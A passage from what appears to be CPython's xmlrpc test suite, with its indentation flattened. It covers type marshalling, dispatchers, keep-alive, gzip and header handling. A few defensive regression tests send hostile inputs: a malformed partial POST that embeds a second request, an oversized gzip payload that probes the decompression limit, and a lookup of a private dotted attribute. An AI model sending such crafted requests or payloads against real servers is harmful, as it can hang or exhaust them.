(newvalue,) = result
self.assertEqual(newvalue, sample)
self.assertIs(type(newvalue), bytes)
self.assertIsNone(m)
result, m = xmlrpclib.loads(s, use_builtin_types=False)
(newvalue,) = result
self.assertEqual(newvalue, sample)
self.assertIs(type(newvalue), xmlrpclib.Binary)
self.assertIsNone(m)
def test_loads_unsupported(self):
ResponseError = xmlrpclib.ResponseError
data = '<params><param><value><spam/></value></param></params>'
self.assertRaises(ResponseError, xmlrpclib.loads, data)
data = ('<params><param><value><array>'
'<value><spam/></value>'
'</array></value></param></params>')
self.assertRaises(ResponseError, xmlrpclib.loads, data)
data = ('<params><param><value><struct>'
'<member><name>a</name><value><spam/></value></member>'
'<member><name>b</name><value><spam/></value></member>'
'</struct></value></param></params>')
self.assertRaises(ResponseError, xmlrpclib.loads, data)
def check_loads(self, s, value, **kwargs):
dump = '<params><param><value>%s</value></param></params>' % s
result, m = xmlrpclib.loads(dump, **kwargs)
(newvalue,) = result
self.assertEqual(newvalue, value)
self.assertIs(type(newvalue), type(value))
self.assertIsNone(m)
def test_load_standard_types(self):
check = self.check_loads
check('string', 'string')
check('<string>string</string>', 'string')
check('<string>𝔘𝔫𝔦𝔠𝔬𝔡𝔢 string</string>', '𝔘𝔫𝔦𝔠𝔬𝔡𝔢 string')
check('<int>2056183947</int>', 2056183947)
check('<int>-2056183947</int>', -2056183947)
check('<i4>2056183947</i4>', 2056183947)
check('<double>46093.78125</double>', 46093.78125)
check('<boolean>0</boolean>', False)
check('<base64>AGJ5dGUgc3RyaW5n/w==</base64>',
xmlrpclib.Binary(b'\x00byte string\xff'))
check('<base64>AGJ5dGUgc3RyaW5n/w==</base64>',
b'\x00byte string\xff', use_builtin_types=True)
check('<dateTime.iso8601>20050210T11:41:23</dateTime.iso8601>',
xmlrpclib.DateTime('20050210T11:41:23'))
check('<dateTime.iso8601>20050210T11:41:23</dateTime.iso8601>',
datetime.datetime(2005, 2, 10, 11, 41, 23),
use_builtin_types=True)
check('<array><data>'
'<value><int>1</int></value><value><int>2</int></value>'
'</data></array>', [1, 2])
check('<struct>'
'<member><name>b</name><value><int>2</int></value></member>'
'<member><name>a</name><value><int>1</int></value></member>'
'</struct>', {'a': 1, 'b': 2})
def test_load_extension_types(self):
check = self.check_loads
check('<nil/>', None)
check('<ex:nil/>', None)
check('<i1>205</i1>', 205)
check('<i2>20561</i2>', 20561)
check('<i8>9876543210</i8>', 9876543210)
check('<biginteger>98765432100123456789</biginteger>',
98765432100123456789)
check('<float>93.78125</float>', 93.78125)
check('<bigdecimal>9876543210.0123456789</bigdecimal>',
decimal.Decimal('9876543210.0123456789'))
def test_get_host_info(self):
# see bug #3613, this raised a TypeError
transp = xmlrpc.client.Transport()
self.assertEqual(transp.get_host_info("user@host.tld"),
('host.tld',
[('Authorization', 'Basic dXNlcg==')], {}))
def test_ssl_presence(self):
try:
import ssl
except ImportError:
has_ssl = False
else:
has_ssl = True
try:
xmlrpc.client.ServerProxy('https://localhost:9999').bad_function()
except NotImplementedError:
self.assertFalse(has_ssl, "xmlrpc client's error with SSL support")
except OSError:
self.assertTrue(has_ssl)
def test_keepalive_disconnect(self):
class RequestHandler(http.server.BaseHTTPRequestHandler):
protocol_version = "HTTP/1.1"
handled = False
def do_POST(self):
length = int(self.headers.get("Content-Length"))
self.rfile.read(length)
if self.handled:
self.close_connection = True
return
response = xmlrpclib.dumps((5,), methodresponse=True)
response = response.encode()
self.send_response(http.HTTPStatus.OK)
self.send_header("Content-Length", len(response))
self.end_headers()
self.wfile.write(response)
self.handled = True
self.close_connection = False
def log_message(self, format, *args):
# don't clobber sys.stderr
pass
def run_server():
server.socket.settimeout(float(1)) # Don't hang if client fails
server.handle_request() # First request and attempt at second
server.handle_request() # Retried second request
server = http.server.HTTPServer((socket_helper.HOST, 0), RequestHandler)
self.addCleanup(server.server_close)
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join)
url = "http://{}:{}/".format(*server.server_address)
with xmlrpclib.ServerProxy(url) as p:
self.assertEqual(p.method(), 5)
self.assertEqual(p.method(), 5)
class SimpleXMLRPCDispatcherTestCase(unittest.TestCase):
class DispatchExc(Exception):
"""Raised inside the dispatched functions when checking for
chained exceptions"""
def test_call_registered_func(self):
"""Calls explicitly registered function"""
# Makes sure any exception raised inside the function has no other
# exception chained to it
exp_params = 1, 2, 3
def dispatched_func(*params):
raise self.DispatchExc(params)
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_function(dispatched_func)
with self.assertRaises(self.DispatchExc) as exc_ctx:
dispatcher._dispatch('dispatched_func', exp_params)
self.assertEqual(exc_ctx.exception.args, (exp_params,))
self.assertIsNone(exc_ctx.exception.__cause__)
self.assertIsNone(exc_ctx.exception.__context__)
def test_call_instance_func(self):
"""Calls a registered instance attribute as a function"""
# Makes sure any exception raised inside the function has no other
# exception chained to it
exp_params = 1, 2, 3
class DispatchedClass:
def dispatched_func(self, *params):
raise SimpleXMLRPCDispatcherTestCase.DispatchExc(params)
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_instance(DispatchedClass())
with self.assertRaises(self.DispatchExc) as exc_ctx:
dispatcher._dispatch('dispatched_func', exp_params)
self.assertEqual(exc_ctx.exception.args, (exp_params,))
self.assertIsNone(exc_ctx.exception.__cause__)
self.assertIsNone(exc_ctx.exception.__context__)
def test_call_dispatch_func(self):
"""Calls the registered instance's `_dispatch` function"""
# Makes sure any exception raised inside the function has no other
# exception chained to it
exp_method = 'method'
exp_params = 1, 2, 3
class TestInstance:
def _dispatch(self, method, params):
raise SimpleXMLRPCDispatcherTestCase.DispatchExc(
method, params)
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_instance(TestInstance())
with self.assertRaises(self.DispatchExc) as exc_ctx:
dispatcher._dispatch(exp_method, exp_params)
self.assertEqual(exc_ctx.exception.args, (exp_method, exp_params))
self.assertIsNone(exc_ctx.exception.__cause__)
self.assertIsNone(exc_ctx.exception.__context__)
def test_registered_func_is_none(self):
"""Calls explicitly registered function which is None"""
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_function(None, name='method')
with self.assertRaisesRegex(Exception, 'method'):
dispatcher._dispatch('method', ('param',))
def test_instance_has_no_func(self):
"""Attempts to call nonexistent function on a registered instance"""
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
dispatcher.register_instance(object())
with self.assertRaisesRegex(Exception, 'method'):
dispatcher._dispatch('method', ('param',))
def test_cannot_locate_func(self):
"""Calls a function that the dispatcher cannot locate"""
dispatcher = xmlrpc.server.SimpleXMLRPCDispatcher()
with self.assertRaisesRegex(Exception, 'method'):
dispatcher._dispatch('method', ('param',))
class HelperTestCase(unittest.TestCase):
def test_escape(self):
self.assertEqual(xmlrpclib.escape("a&b"), "a&b")
self.assertEqual(xmlrpclib.escape("a<b"), "a<b")
self.assertEqual(xmlrpclib.escape("a>b"), "a>b")
class FaultTestCase(unittest.TestCase):
def test_repr(self):
f = xmlrpclib.Fault(42, 'Test Fault')
self.assertEqual(repr(f), "<Fault 42: 'Test Fault'>")
self.assertEqual(repr(f), str(f))
def test_dump_fault(self):
f = xmlrpclib.Fault(42, 'Test Fault')
s = xmlrpclib.dumps((f,))
(newf,), m = xmlrpclib.loads(s)
self.assertEqual(newf, {'faultCode': 42, 'faultString': 'Test Fault'})
self.assertEqual(m, None)
s = xmlrpclib.Marshaller().dumps(f)
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, s)
def test_dotted_attribute(self):
# this will raise AttributeError because code don't want us to use
# private methods
self.assertRaises(AttributeError,
xmlrpc.server.resolve_dotted_attribute, str, '__add')
self.assertTrue(xmlrpc.server.resolve_dotted_attribute(str, 'title'))
class DateTimeTestCase(unittest.TestCase):
def test_default(self):
with mock.patch('time.localtime') as localtime_mock:
time_struct = time.struct_time(
[2013, 7, 15, 0, 24, 49, 0, 196, 0])
localtime_mock.return_value = time_struct
localtime = time.localtime()
t = xmlrpclib.DateTime()
self.assertEqual(str(t),
time.strftime("%Y%m%dT%H:%M:%S", localtime))
def test_time(self):
d = 1181399930.036952
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t),
time.strftime("%Y%m%dT%H:%M:%S", time.localtime(d)))
def test_time_tuple(self):
d = (2007,6,9,10,38,50,5,160,0)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070609T10:38:50')
def test_time_struct(self):
d = time.localtime(1181399930.036952)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", d))
def test_datetime_datetime(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070102T03:04:05')
def test_repr(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
val ="<DateTime '20070102T03:04:05' at %#x>" % id(t)
self.assertEqual(repr(t), val)
def test_decode(self):
d = ' 20070908T07:11:13 '
t1 = xmlrpclib.DateTime()
t1.decode(d)
tref = xmlrpclib.DateTime(datetime.datetime(2007,9,8,7,11,13))
self.assertEqual(t1, tref)
t2 = xmlrpclib._datetime(d)
self.assertEqual(t2, tref)
def test_comparison(self):
now = datetime.datetime.now()
dtime = xmlrpclib.DateTime(now.timetuple())
# datetime vs. DateTime
self.assertTrue(dtime == now)
self.assertTrue(now == dtime)
then = now + datetime.timedelta(seconds=4)
self.assertTrue(then >= dtime)
self.assertTrue(dtime < then)
# str vs. DateTime
dstr = now.strftime("%Y%m%dT%H:%M:%S")
self.assertTrue(dtime == dstr)
self.assertTrue(dstr == dtime)
dtime_then = xmlrpclib.DateTime(then.timetuple())
self.assertTrue(dtime_then >= dstr)
self.assertTrue(dstr < dtime_then)
# some other types
dbytes = dstr.encode('ascii')
dtuple = now.timetuple()
self.assertFalse(dtime == 1970)
self.assertTrue(dtime != dbytes)
self.assertFalse(dtime == bytearray(dbytes))
self.assertTrue(dtime != dtuple)
with self.assertRaises(TypeError):
dtime < float(1970)
with self.assertRaises(TypeError):
dtime > dbytes
with self.assertRaises(TypeError):
dtime <= bytearray(dbytes)
with self.assertRaises(TypeError):
dtime >= dtuple
self.assertTrue(dtime == ALWAYS_EQ)
self.assertFalse(dtime != ALWAYS_EQ)
self.assertTrue(dtime < LARGEST)
self.assertFalse(dtime > LARGEST)
self.assertTrue(dtime <= LARGEST)
self.assertFalse(dtime >= LARGEST)
self.assertFalse(dtime < SMALLEST)
self.assertTrue(dtime > SMALLEST)
self.assertFalse(dtime <= SMALLEST)
self.assertTrue(dtime >= SMALLEST)
class BinaryTestCase(unittest.TestCase):
# XXX What should str(Binary(b"\xff")) return? I'm chosing "\xff"
# for now (i.e. interpreting the binary data as Latin-1-encoded
# text). But this feels very unsatisfactory. Perhaps we should
# only define repr(), and return r"Binary(b'\xff')" instead?
def test_default(self):
t = xmlrpclib.Binary()
self.assertEqual(str(t), '')
def test_string(self):
d = b'\x01\x02\x03abc123\xff\xfe'
t = xmlrpclib.Binary(d)
self.assertEqual(str(t), str(d, "latin-1"))
def test_decode(self):
d = b'\x01\x02\x03abc123\xff\xfe'
de = base64.encodebytes(d)
t1 = xmlrpclib.Binary()
t1.decode(de)
self.assertEqual(str(t1), str(d, "latin-1"))
t2 = xmlrpclib._binary(de)
self.assertEqual(str(t2), str(d, "latin-1"))
ADDR = PORT = URL = None
# The evt is set twice. First when the server is ready to serve.
# Second when the server has been shutdown. The user must clear
# the event after it has been set the first time to catch the second set.
def http_server(evt, numrequests, requestHandler=None, encoding=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
class Fixture:
@staticmethod
def getData():
return '42'
class MyXMLRPCServer(xmlrpc.server.SimpleXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = xmlrpc.server.SimpleXMLRPCRequestHandler
serv = MyXMLRPCServer(("localhost", 0), requestHandler,
encoding=encoding,
logRequests=False, bind_and_activate=False)
try:
serv.server_bind()
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
serv.register_introspection_functions()
serv.register_multicall_functions()
serv.register_function(pow)
serv.register_function(lambda x: x, 'têšt')
@serv.register_function
def my_function():
'''This is my function'''
return True
@serv.register_function(name='add')
def _(x, y):
return x + y
testInstance = TestInstanceClass()
serv.register_instance(testInstance, allow_dotted_names=True)
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
def http_multi_server(evt, numrequests, requestHandler=None):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(xmlrpc.server.MultiPathXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
if not requestHandler:
requestHandler = xmlrpc.server.SimpleXMLRPCRequestHandler
class MyRequestHandler(requestHandler):
rpc_paths = []
class BrokenDispatcher:
def _marshaled_dispatch(self, data, dispatch_method=None, path=None):
raise RuntimeError("broken dispatcher")
serv = MyXMLRPCServer(("localhost", 0), MyRequestHandler,
logRequests=False, bind_and_activate=False)
serv.socket.settimeout(3)
serv.server_bind()
try:
global ADDR, PORT, URL
ADDR, PORT = serv.socket.getsockname()
#connect to IP address directly. This avoids socket.create_connection()
#trying to connect to "localhost" using all address families, which
#causes slowdown e.g. on vista which supports AF_INET6. The server listens
#on AF_INET only.
URL = "http://%s:%d"%(ADDR, PORT)
serv.server_activate()
paths = ["/foo", "/foo/bar"]
for path in paths:
d = serv.add_dispatcher(path, xmlrpc.server.SimpleXMLRPCDispatcher())
d.register_introspection_functions()
d.register_multicall_functions()
serv.get_dispatcher(paths[0]).register_function(pow)
serv.get_dispatcher(paths[1]).register_function(lambda x,y: x+y, 'add')
serv.add_dispatcher("/is/broken", BrokenDispatcher())
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
# This function prevents errors like:
# <ProtocolError for localhost:57527/RPC2: 500 Internal Server Error>
def is_unavailable_exception(e):
'''Returns True if the given ProtocolError is the product of a server-side
exception caused by the 'temporarily unavailable' response sometimes
given by operations on non-blocking sockets.'''
# sometimes we get a -1 error code and/or empty headers
try:
if e.errcode == -1 or e.headers is None:
return True
exc_mess = e.headers.get('X-exception')
except AttributeError:
# Ignore OSErrors here.
exc_mess = str(e)
if exc_mess and 'temporarily unavailable' in exc_mess.lower():
return True
def make_request_and_skipIf(condition, reason):
# If we skip the test, we have to make a request because
# the server created in setUp blocks expecting one to come in.
if not condition:
return lambda func: func
def decorator(func):
def make_request_and_skip(self):
try:
xmlrpclib.ServerProxy(URL).my_function()
except (xmlrpclib.ProtocolError, OSError) as e:
if not is_unavailable_exception(e):
raise
raise unittest.SkipTest(reason)
return make_request_and_skip
return decorator
class BaseServerTestCase(unittest.TestCase):
requestHandler = None
request_count = 1
threadFunc = staticmethod(http_server)
def setUp(self):
# enable traceback reporting
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, self.request_count, self.requestHandler)
thread = threading.Thread(target=self.threadFunc, args=serv_args)
thread.start()
self.addCleanup(thread.join)
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# disable traceback reporting
xmlrpc.server.SimpleXMLRPCServer._send_traceback_header = False
class SimpleServerTestCase(BaseServerTestCase):
def test_simple1(self):
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_nonascii(self):
start_string = 'P\N{LATIN SMALL LETTER Y WITH CIRCUMFLEX}t'
end_string = 'h\N{LATIN SMALL LETTER O WITH HORN}n'
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_client_encoding(self):
start_string = '\u20ac'
end_string = '\xa4'
try:
p = xmlrpclib.ServerProxy(URL, encoding='iso-8859-15')
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_nonascii_methodname(self):
try:
p = xmlrpclib.ServerProxy(URL, encoding='ascii')
self.assertEqual(p.têšt(42), 42)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_404(self):
# send POST with http.client, it should return 404 header and
# 'Not Found' message.
with contextlib.closing(http.client.HTTPConnection(ADDR, PORT)) as conn:
conn.request('POST', '/this-is-not-valid')
response = conn.getresponse()
self.assertEqual(response.status, 404)
self.assertEqual(response.reason, 'Not Found')
def test_introspection1(self):
expected_methods = set(['pow', 'div', 'my_function', 'add', 'têšt',
'system.listMethods', 'system.methodHelp',
'system.methodSignature', 'system.multicall',
'Fixture'])
try:
p = xmlrpclib.ServerProxy(URL)
meth = p.system.listMethods()
self.assertEqual(set(meth), expected_methods)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection2(self):
try:
# test _methodHelp()
p = xmlrpclib.ServerProxy(URL)
divhelp = p.system.methodHelp('div')
self.assertEqual(divhelp, 'This is the div function')
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
@make_request_and_skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_introspection3(self):
try:
# test native doc
p = xmlrpclib.ServerProxy(URL)
myfunction = p.system.methodHelp('my_function')
self.assertEqual(myfunction, 'This is my function')
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection4(self):
# the SimpleXMLRPCServer doesn't support signatures, but
# at least check that we can try making the call
try:
p = xmlrpclib.ServerProxy(URL)
divsig = p.system.methodSignature('div')
self.assertEqual(divsig, 'signatures not supported')
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.add(2,3)
multicall.pow(6,8)
multicall.div(127,42)
add_result, pow_result, div_result = multicall()
self.assertEqual(add_result, 2+3)
self.assertEqual(pow_result, 6**8)
self.assertEqual(div_result, 127//42)
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_non_existing_multicall(self):
try:
p = xmlrpclib.ServerProxy(URL)
multicall = xmlrpclib.MultiCall(p)
multicall.this_is_not_exists()
result = multicall()
# result.results contains;
# [{'faultCode': 1, 'faultString': '<class \'exceptions.Exception\'>:'
# 'method "this_is_not_exists" is not supported'>}]
self.assertEqual(result.results[0]['faultCode'], 1)
self.assertEqual(result.results[0]['faultString'],
'<class \'Exception\'>:method "this_is_not_exists" '
'is not supported')
except (xmlrpclib.ProtocolError, OSError) as e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_dotted_attribute(self):
# Raises an AttributeError because private methods are not allowed.
self.assertRaises(AttributeError,
xmlrpc.server.resolve_dotted_attribute, str, '__add')
self.assertTrue(xmlrpc.server.resolve_dotted_attribute(str, 'title'))
# Get the test to run faster by sending a request with test_simple1.
# This avoids waiting for the socket timeout.
self.test_simple1()
def test_allow_dotted_names_true(self):
# XXX also need allow_dotted_names_false test.
server = xmlrpclib.ServerProxy("http://%s:%d/RPC2" % (ADDR, PORT))
data = server.Fixture.getData()
self.assertEqual(data, '42')
def test_unicode_host(self):
server = xmlrpclib.ServerProxy("http://%s:%d/RPC2" % (ADDR, PORT))
self.assertEqual(server.add("a", "\xe9"), "a\xe9")
def test_partial_post(self):
# Check that a partial POST doesn't make the server loop: issue #14001.
with contextlib.closing(socket.create_connection((ADDR, PORT))) as conn:
conn.send('POST /RPC2 HTTP/1.0\r\n'
'Content-Length: 100\r\n\r\n'
'bye HTTP/1.1\r\n'
f'Host: {ADDR}:{PORT}\r\n'
'Accept-Encoding: identity\r\n'
'Content-Length: 0\r\n\r\n'.encode('ascii'))
def test_context_manager(self):
with xmlrpclib.ServerProxy(URL) as server:
server.add(2, 3)
self.assertNotEqual(server('transport')._connection,
(None, None))
self.assertEqual(server('transport')._connection,
(None, None))
def test_context_manager_method_error(self):
try:
with xmlrpclib.ServerProxy(URL) as server:
server.add(2, "a")
except xmlrpclib.Fault:
pass
self.assertEqual(server('transport')._connection,
(None, None))
class SimpleServerEncodingTestCase(BaseServerTestCase):
@staticmethod
def threadFunc(evt, numrequests, requestHandler=None, encoding=None):
http_server(evt, numrequests, requestHandler, 'iso-8859-15')
def test_server_encoding(self):
start_string = '\u20ac'
end_string = '\xa4'
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.add(start_string, end_string),
start_string + end_string)
except (xmlrpclib.ProtocolError, socket.error) as e:
# ignore failures due to non-blocking socket unavailable errors.
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
class MultiPathServerTestCase(BaseServerTestCase):
threadFunc = staticmethod(http_multi_server)
request_count = 2
def test_path1(self):
p = xmlrpclib.ServerProxy(URL+"/foo")
self.assertEqual(p.pow(6,8), 6**8)
self.assertRaises(xmlrpclib.Fault, p.add, 6, 8)
def test_path2(self):
p = xmlrpclib.ServerProxy(URL+"/foo/bar")
self.assertEqual(p.add(6,8), 6+8)
self.assertRaises(xmlrpclib.Fault, p.pow, 6, 8)
def test_path3(self):
p = xmlrpclib.ServerProxy(URL+"/is/broken")
self.assertRaises(xmlrpclib.Fault, p.add, 6, 8)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class BaseKeepaliveServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(xmlrpc.server.SimpleXMLRPCRequestHandler):
parentClass = xmlrpc.server.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
myRequests = []
def handle(self):
self.myRequests.append([])
self.reqidx = len(self.myRequests)-1
return self.parentClass.handle(self)
def handle_one_request(self):
result = self.parentClass.handle_one_request(self)
self.myRequests[self.reqidx].append(self.raw_requestline)
return result
requestHandler = RequestHandler
def setUp(self):
#clear request log
self.RequestHandler.myRequests = []
return BaseServerTestCase.setUp(self)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class KeepaliveServerTestCase1(BaseKeepaliveServerTestCase):
def test_two(self):
p = xmlrpclib.ServerProxy(URL)
#do three requests.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")()
#they should have all been handled by a single request handler
self.assertEqual(len(self.RequestHandler.myRequests), 1)
#check that we did at least two (the third may be pending append
#due to thread scheduling)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
#test special attribute access on the serverproxy, through the __call__
#function.
class KeepaliveServerTestCase2(BaseKeepaliveServerTestCase):
#ask for two keepalive requests to be handled.
request_count=2
def test_close(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")() #this should trigger a new keep-alive request
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
self.assertEqual(p.pow(6,8), 6**8)
p("close")()
#they should have all been two request handlers, each having logged at least
#two complete requests
self.assertEqual(len(self.RequestHandler.myRequests), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
self.assertGreaterEqual(len(self.RequestHandler.myRequests[-2]), 2)
def test_transport(self):
p = xmlrpclib.ServerProxy(URL)
#do some requests with close.
self.assertEqual(p.pow(6,8), 6**8)
p("transport").close() #same as above, really.
self.assertEqual(p.pow(6,8), 6**8)
p("close")()
self.assertEqual(len(self.RequestHandler.myRequests), 2)
#A test case that verifies that gzip encoding works in both directions
#(for a request and the response)
@unittest.skipIf(gzip is None, 'requires gzip')
class GzipServerTestCase(BaseServerTestCase):
#a request handler that supports keep-alive and logs requests into a
#class variable
class RequestHandler(xmlrpc.server.SimpleXMLRPCRequestHandler):
parentClass = xmlrpc.server.SimpleXMLRPCRequestHandler
protocol_version = 'HTTP/1.1'
def do_POST(self):
#store content of last request in class
self.__class__.content_length = int(self.headers["content-length"])
return self.parentClass.do_POST(self)
requestHandler = RequestHandler
class Transport(xmlrpclib.Transport):
#custom transport, stores the response length for our perusal
fake_gzip = False
def parse_response(self, response):
self.response_length=int(response.getheader("content-length", 0))
return xmlrpclib.Transport.parse_response(self, response)
def send_content(self, connection, body):
if self.fake_gzip:
#add a lone gzip header to induce decode error remotely
connection.putheader("Content-Encoding", "gzip")
return xmlrpclib.Transport.send_content(self, connection, body)
def setUp(self):
BaseServerTestCase.setUp(self)
def test_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
p = xmlrpclib.ServerProxy(URL, transport=t)
self.assertEqual(p.pow(6,8), 6**8)
a = self.RequestHandler.content_length
t.encode_threshold = 0 #turn on request encoding
self.assertEqual(p.pow(6,8), 6**8)
b = self.RequestHandler.content_length
self.assertTrue(a>b)
p("close")()
def test_bad_gzip_request(self):
t = self.Transport()
t.encode_threshold = None
t.fake_gzip = True
p = xmlrpclib.ServerProxy(URL, transport=t)
cm = self.assertRaisesRegex(xmlrpclib.ProtocolError,
re.compile(r"\b400\b"))
with cm:
p.pow(6, 8)
p("close")()
def test_gzip_response(self):
t = self.Transport()
p = xmlrpclib.ServerProxy(URL, transport=t)
old = self.requestHandler.encode_threshold
self.requestHandler.encode_threshold = None #no encoding
self.assertEqual(p.pow(6,8), 6**8)
a = t.response_length
self.requestHandler.encode_threshold = 0 #always encode
self.assertEqual(p.pow(6,8), 6**8)
p("close")()
b = t.response_length
self.requestHandler.encode_threshold = old
self.assertTrue(a>b)
@unittest.skipIf(gzip is None, 'requires gzip')
class GzipUtilTestCase(unittest.TestCase):
def test_gzip_decode_limit(self):
max_gzip_decode = 20 * 1024 * 1024
data = b'\0' * max_gzip_decode
encoded = xmlrpclib.gzip_encode(data)
decoded = xmlrpclib.gzip_decode(encoded)
self.assertEqual(len(decoded), max_gzip_decode)
data = b'\0' * (max_gzip_decode + 1)
encoded = xmlrpclib.gzip_encode(data)
with self.assertRaisesRegex(ValueError,
"max gzipped payload length exceeded"):
xmlrpclib.gzip_decode(encoded)
xmlrpclib.gzip_decode(encoded, max_decode=-1)
class HeadersServerTestCase(BaseServerTestCase):
class RequestHandler(xmlrpc.server.SimpleXMLRPCRequestHandler):
test_headers = None
def do_POST(self):
self.__class__.test_headers = self.headers
return super().do_POST()
requestHandler = RequestHandler
standard_headers = [
'Host', 'Accept-Encoding', 'Content-Type', 'User-Agent',
'Content-Length']
def setUp(self):
self.RequestHandler.test_headers = None
return super().setUp()
def assertContainsAdditionalHeaders(self, headers, additional):
expected_keys = sorted(self.standard_headers + list(additional.keys()))
self.assertListEqual(sorted(headers.keys()), expected_keys)
for key, value in additional.items():
self.assertEqual(headers.get(key), value)
def test_header(self):
p = xmlrpclib.ServerProxy(URL, headers=[('X-Test', 'foo')])
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(headers, {'X-Test': 'foo'})
def test_header_many(self):
p = xmlrpclib.ServerProxy(
URL, headers=[('X-Test', 'foo'), ('X-Test-Second', 'bar')])
self.assertEqual(p.pow(6, 8), 6**8)
headers = self.RequestHandler.test_headers
self.assertContainsAdditionalHeaders(
